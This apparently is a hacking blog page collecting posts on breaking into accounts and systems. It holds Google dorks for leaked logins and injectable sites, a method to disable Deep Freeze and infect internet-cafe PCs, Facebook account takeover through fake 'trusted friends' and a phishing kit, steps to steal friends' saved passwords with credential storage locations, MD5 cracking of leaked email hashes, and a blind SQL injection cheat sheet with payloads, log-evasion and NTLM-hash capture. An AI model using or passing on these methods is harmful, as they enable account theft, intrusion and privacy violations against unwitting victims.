468x60 Ads

Demo image Demo image Demo image Demo image Demo image >
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Hack Premium accounts Easy Noob Friendly

0 comments

note: Credit to Team GB elite
Tools:
Google
Common Sense
Patience (kasi try and try method to guys)

Steps:
1. Go to google.com
2. type the this dork

Program: Url/Host:http://www.megaupload.com Login: Password: Computer: Date: Ip:

3. click sa makikitang mga Result..
4. yan na.. hanap n kayo ng mga working premium accounts,, gnagamit namin to and still getting pa rin..

if gusto nyo ng rapidshare, hotfile or etc.. just edit the url/host

example Url/Host:http://www.hotfile.com

How to destroy a computer in an internet cafe....

0 comments

Ahh...for educational purpose only.............

Almost all internet cafes today have Deep Freeze...but what is deep freeze??

-->

Deep Freeze, by Faronics, is an application suite for Linux, Mac OS X, and Microsoft Windows. Deep Freeze gives administrators the ability to protect the core operating system files and configuration files of an environment without eliminating the usability for (most) end users.

To know more about Deep Freeze ------> http://en.wikipedia.org/wiki/Deep_Freeze_(software

To know if the computer that you are using is in a Deep Freeze Frozen State...
you should see a icon at the bottom right side of your desktop that looks like this----->>>>




If you see this icon....the computer is in a frozen state....meaning.....
if you will install any software or if you will save any documents in the PC...a simple restart will erase all things that you saved when you are using it.....

DeepFreeze has a password....but how can you disable this????

first go to the bios menu....i'm sure you all know where it is.....

-----> when you start your computer....press del button until the menu goes blue.....

Change the year 2 years earlier from the present...
example.....

the year now is 2009-----change it to 2007
then continue the start up.....

the next thing that you will do is to shut the DF5serv.exe <---this can be found in the process list when you press ctrl+alt+del button when you are in the desktop...
question---> what if the task manager is disabled by the admin??
download this:
http://www.taskmanagerfix.com/

after finding the process DF5serv.exe...
end its process......

NOTE: If you will not change the date in the bios...
when you'll try to kill the DF5Serv.exe, the computer will tell you that DF5Serv.exe will not be accessible or it is access denied.....

if the kill process is successful, now you should uninstall the DeepFreeze....you can uninstall it by downloading this:

http://download.cnet.com/Deep-Freeze-Sta...72668.html

Here comes the interesting part.....

Ask yourself....

how can you destroy or how can you make a corruption in the system software??

Simply by virus.......

there are many virus generators here......just use the search button.....

Goodluck!!!!


Hack Facebook accounts very easily by adding to friends! [New method + pictures]

2 comments

In this tutorial is no skill required, we'll just using the password recovery process with 3 fake profiles.

For this you need to make 3 fake profiles on Facebook, you're slave needs to add them to his friends!

First go to the password recovery process, which is accessible through Forgot your password? on the Facebook login page.

http://img717.imageshack.us/i/forgotyourpassword.png/

Then you need to identify your victims account by using his Facebook E-mail, Facebook name or Facebook name + Facebook friend name. The easiest is to enter his Facebook name.
When you got the account click on This Is My account.

http://img219.imageshack.us/i/enteryourfacebookuserna.png/

Once you could identify you're victims profile, Facebook suggest to recover the password by the existing email address. You can bypass that by clicking on No longer have access to these?

http://img42.imageshack.us/i/nolongerhaveaccesstothe.png/

After that just enter an new email address.

http://img809.imageshack.us/i/newemail.png/

Then Facebook will ask the secret question(If the slave has a question), to bypass that you'll need to typing the wrong answer three times. After that Facebook will try to help you recover the password by the support of 3 friends.

Just select your three fake profiles that your slave added to his friends.(The friends must be registered since a week!)

http://img805.imageshack.us/i/selectafriend.png/

Then you'll get a code on your fake profiles, with those 3 codes you can easily change the password.

NOTE: The account will be closed for 24 hours ans the old email and the three friend who were given the codes receives a notification that the password changed.


Poizon Proxy Processor v1.0 (Ultimate Fast Proxy Downloader + Checker)

3 comments

Greetings to All Anonyms out there!

"Summer" is here for you and with a new tool which is Smart, Beautiful and Handy.

Its called "Poizon Proxy Processor, Tripple-P".

As the name says this tool deals with Proxies. You have seen many Proxy Tools out there that are smart too but this one is different. Trust me.

This tool uses a technique which is different from other Proxy Checkers. Research has been conducted on Proxy Checking Techniques and the BEST one is applied in this tool. The tool has been made flexible for user comfort.

All in One with almost all features you can expect. (Pardon me if I missed something).

Poizon Proxy Processor: (Features)

User-friendly interface.
Fully Multi-Threaded with asynchronous operation threads.
No Thread termination wait to suffer after pressing Stop.
Flexible to close application any time even when threads are running and working.

This tool contains 3 tools in one.

1] Poizon Proxy Downloader
A very smart and speedy proxies downloader.
Inner engine is build with comprehensive Regular Expressions to extract proxies from almost any kind of web page or a text file or any other text formatted file. The best match will be { ip:port, <td>ip</td><td>port</td> }
Good in flexibility to allow user to add new proxy sites.
Worth usefull functions like adding, editing, deleting etc.
Rating column to rate sites according to your view.
Progress of downloading and bytes receiving.
List Sorting.

2] Poizon proxy Checker
Proxy checker with Ultra Sonic Speed that you have never seen.
Can scan a huge list of sites within minutes.
Flexible to allow user to import and export proxy lists.
Duplicate proxies remover.
Surprising feature of identifying countries against IP's within seconds. Works on GeoIP data which is bundled with the tool.
Nice looking interface with progress controls.
Scan IP Range, This is one of the wonderful feature of this tool. When you dont have an IP list and want to scan the Proxy Servers on the internet then this tool will generate a list for a given range of IP's and then you can check them at the point. This way you can find Proxy Servers your way without downloading any IP list from a website.
List Sorting.

3] Poizon Anonymity Checker
Yet to be build but will only available in Pro version. 





How to get online products without paying a cent.

4 comments

This summary is not available. Please click here to view the post.

Usefull site's for SQL injection hacking

2 comments


1. Ultimate SQLi Tutorial

http://adf.ly/EK1b

This Tutorial is really nice for understanding the basics of MySQL injection.
(NOTE: This tutorial is for MySQL Database Version 5)


2. HellBound Hackers MySQL injection Tutorial

http://adf.ly/EKCk

Not so easy to read but it goes trough both Mysql database Version 4 and 5


3. Online SQLi Scanner

http://adf.ly/EC4S

Probably one of the best SQL injection scanner there is.
(NOTE) sometimes its kind of slow, just reload the page


3. Big list of Google dorks

http://adf.ly/EKD2
4. th3-0utl4ws Online Admin login finder

http://adf.ly/EKCA

This Online tool will search for the admin login


4. Online md5 decrypter/Cracker

http://adf.ly/EKEA

Huge database of cracked md5 and sha1 hash.

Some Good sql injection Error Based Dorks

0 comments

Search In google:)
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()

Download Free WiFi Radar and WiFi Hack Tools AIO

2 comments

Surf The World For Free WiFi Radar and WiFi Hack Tools AIO | 18.5MB

Wifi related tools for H@Ck wireless connection and many more. Surf The World For Free WiFi Radar & WiFi Hack Tools (Snip The WiFi Soft, Brake Its Security, And Surf The Universe). Surf The Internet Freely Charged. Some of the applications included are WIFI Radar Aircrack-2.3 802.11 sniffer and WEP / WPA Key Cracker Easy to use the wifi key finder even find key 128-bit encryption .. WPA-PSK, lo que sea que usted lo encontrará. WPA-PSK, which is that you'll find.

right way to inject Sql Injection

0 comments

1)>>>PROBLEM:
union select 1,2,group_concat(table_name),4,5 from information_schema.tables--

2)>>> FIX:
union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--

table_schema is the database so when you type table_schema=database() it returns true and dumps all user created tables, the same for columns:

union select 1,2,group_concat(column_name),4,5 +from+information_schema.columns+where table_schema=database()--

THE BEST AND NEWEST SQL INJECTION DORK LIST

0 comments

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=

The easiest and the most effective way to get your friends' passwords.

0 comments

This is more of a social engineering attack. But its the easiest social engineering attack. You just need to ask your friend to use his laptop for TWO minutes.

And the results are, 99 percent success.

Now, we know that all of us save our passwords in mozilla or chrome. We will exploit this fact.

Just take your friends laptop and open Mozilla Firefox, Internet Explorer or Google Chrome, whatever is used by your friend. We are going to steal his/her saved passwords.

For Mozilla Firefox:
  • Open Firefox
  • Select Tools --> Options
  • Now in the Security tab, press Saved Passwords.
  • From the the new popup window, select Show Passwords and confirm.

And boom, you have their passwords, all of them.

For Google Chrome:
  • Select Options
  • From the Password category, select Show saved passwords.
  • Now select individual entries and press Show Password.

Boom, you have their passwords again.

In Internet Explorer:
In Internet explorer, it gets a bit tricky(thank god most of the people have switched to firefox or chrome).

You need to download a program called IE Passview to do it for you:
Download it from here

So, hopefully this tutorial helps you guys and fulfills my motive.

Locations Of All Saved Password In Computer [Computer Shop Hack 3]

0 comments

Google Chrome:
Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location

XP - C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default
Vista - C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default

Trillian:
Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently
Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:

XP (old version) - C:\Program Files\Trillian\users\
XP (new version) - C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global - I am not sure on exact but it is somewhere their
Vista (old version)- C:\Program Files\Trillian\users\
Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal

MSN /Windows Live Messenger:
MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[Account Name]
Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with "WindowsLive:name=". They a set of Win API functions (Credential API's) to store its' security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the "target name" and "type". If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.

Paltalk:
Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.
AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.
The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]

Google Talk:
Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google
Talk\Accounts\[Account Name]

Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.


Yahoo Messenger 6.x:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(”EOptions string” value)

Yahoo Messenger 7.5 or later:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.

AIM:
AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords

No Ip (easy to make in vb.net):
Passwords encoded with Base64 you can find the account information in the following locations

HKEY_LOCAL_MACHINESOFTWARE\Vitalwerks\DUC\", "Password"
HKEY_LOCAL_MACHINESOFTWARE\Vitalwerk\sDUC\", "Checked"
HKEY_LOCAL_MACHINESOFTWARE\Vitalwerks\DUC\", "Username
KEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\", "ProxyUsername
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\", "ProxyPassword"
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\", "Hosts"

Filezilla:
Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this

Internet Explorer 4.00 – 6.00:
The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.

Internet Explorer 7.00 – 8.00:
The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.

Opera:
The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile

Outlook Express (All Versions):
The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 98/2000:
Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.
The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.

ThunderBird:
The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.

Digsby:
The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

Well thats all the one's i no of, if you have any feel free to post them

HACKING AN EMAIL USING GOOGLE [Fast and Simple]

0 comments

Hacking your first email seems boring and needs time,but after reading this tutorial you find it simple and easy !! :p

1)Go to http://www.google.com and type in the search bar this code "ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e"

2)Choose any one of the displayed pages,scroll a bit down ,then something like this should appear,Hash codes and emails.

 3)Now go to : http://www.h4ckforu.com/md5/index.php , then copy the HASH CODE (ex:127359f404a2b735de9ba1336c66f480) depending on the email you choosed to the box. Press Crack it, wait few seconds.


4)Some sites will appear saying "not found" other sites will give you the password of the hash code you entered that belongs to the email you choosed.[As shown in the picture above ]

5)You are done!! Enjoy the email you hacked :D...some emails won't work since the have their passwords changed, or the hash codes results are null.


Credits to Lenovista of HF 

Learn How to Hack Facebook Password 2010 ref

0 comments

Hacking Facebook Account Password: Facebook Phishing for Hacking Facebook

Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend's facebook password. Here i'm writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.[Read more about phishing on Wikipedia]
                                                      
                                                                Facebook Phisher
Please Note: Phishing is legally offensive. I am not responsible for any action done by you.


Hacking Facebook password:

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.

1. First of all download Facebook Phisher

2. The downloaded file contains:

    * Index.html
    * write.php

3. Upload both files to any of these free webhost sites:

    * www.yourfreehosting.net
    * www.drivehq.com
    * www.110mb.com
    * www.t35.com
    * www.esmartstart.com

4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.

5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown.




Hope this tutorial was useful for you.


Blind SQL Injections: Advance Mode

0 comments

In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.
Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injectiona logging function or similar. Not so common though.
In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL,pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.

Real and a bit Complex Blind SQL Injection Attack Sample

This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.
TRUE and FALSE flags mark queries returned true or false.
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.

 

Waiting For Blind SQL Injections

First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.

WAIT FOR DELAY 'time' (S)

This is just like sleep, wait for spesified time. CPU safe way to make database wait.
WAITFOR DELAY '0:0:10'--
Also you can use fractions like this,
WAITFOR DELAY '0:0:0.51'

Real World Samples

  • Are we 'sa' ?
    if (select user) = 'sa' waitfor delay '0:0:10'
  • ProductID = 1;waitfor delay '0:0:10'--
  • ProductID =1);waitfor delay '0:0:10'--
  • ProductID =1';waitfor delay '0:0:10'--
  • ProductID =1');waitfor delay '0:0:10'--
  • ProductID =1));waitfor delay '0:0:10'--
  • ProductID =1'));waitfor delay '0:0:10'--

BENCHMARK() (M)

Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)

Real World Samples

  • Are we root ? woot!
    IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
  • Check Table exist in MySQL
    IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1)) 

pg_sleep(seconds) (P)

Sleep for supplied seconds.
  • SELECT pg_sleep(10); 
    Sleep 10 seconds.

Covering Tracks

SQL Server -sp_password log bypass (S)

SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logstry to use POST if it's possible)

Clear SQL Injection Tests

These tests are simply good for blind sql injection and silent attacks.
  1. product.asp?id=4 (SMO)
    1. product.asp?id=5-1
    2. product.asp?id=4 OR 1=1
  2. product.asp?name=Book
    1. product.asp?name=Bo’%2b’ok
    2. product.asp?name=Bo’ || ’ok (OM)
    3. product.asp?name=Book’ OR ‘x’=’x

Some Extra MySQL Notes

  • Sub Queries are working only MySQL 4.1+
  • Users
    • SELECT User,Password FROM mysql.user;
  • SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROMmysql.user WHERE User = ‘root’;
  • SELECT ... INTO DUMPFILE
    • Write query into a new file (can not modify existing files)
  • UDF Function
    • create function LockWorkStation returns integer soname 'user32';
    • select LockWorkStation(); 
    • create function ExitProcess returns integer soname 'kernel32';
    • select exitprocess();
  • SELECT USER();
  • SELECT password,USER() FROM mysql.user;
  • First byte of admin hash
    • SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
  • Read File
    • query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
  • MySQL Load Data inifile
    • By default it’s not avaliable !
      • create table foo( line blob );
        load data infile 'c:/boot.ini' into table foo;
        select * from foo;
  • More Timing in MySQL
  • select benchmark( 500000, sha1( 'test' ) );
  • query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
  • select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' ); Enumeration data, Guessed Brute Force
    • select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

Potentially Useful MySQL Functions

  • MD5()
    MD5 Hashing 
  • SHA1()
    SHA1 Hashing 
  • PASSWORD()
  • ENCODE()
  • COMPRESS()
    Compress data, can be great in large binary reading in Blind SQL Injections. 
  • ROW_COUNT()
  • SCHEMA()
  • VERSION()
    Same as @@version

Second Order SQL Injections

Basically you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.
Name : ' + (SELECT TOP 1 password FROM users ) + ' 
Email : xx@xx.com
If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.

Forcing SQL Server to get NTLM Hashes

This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel.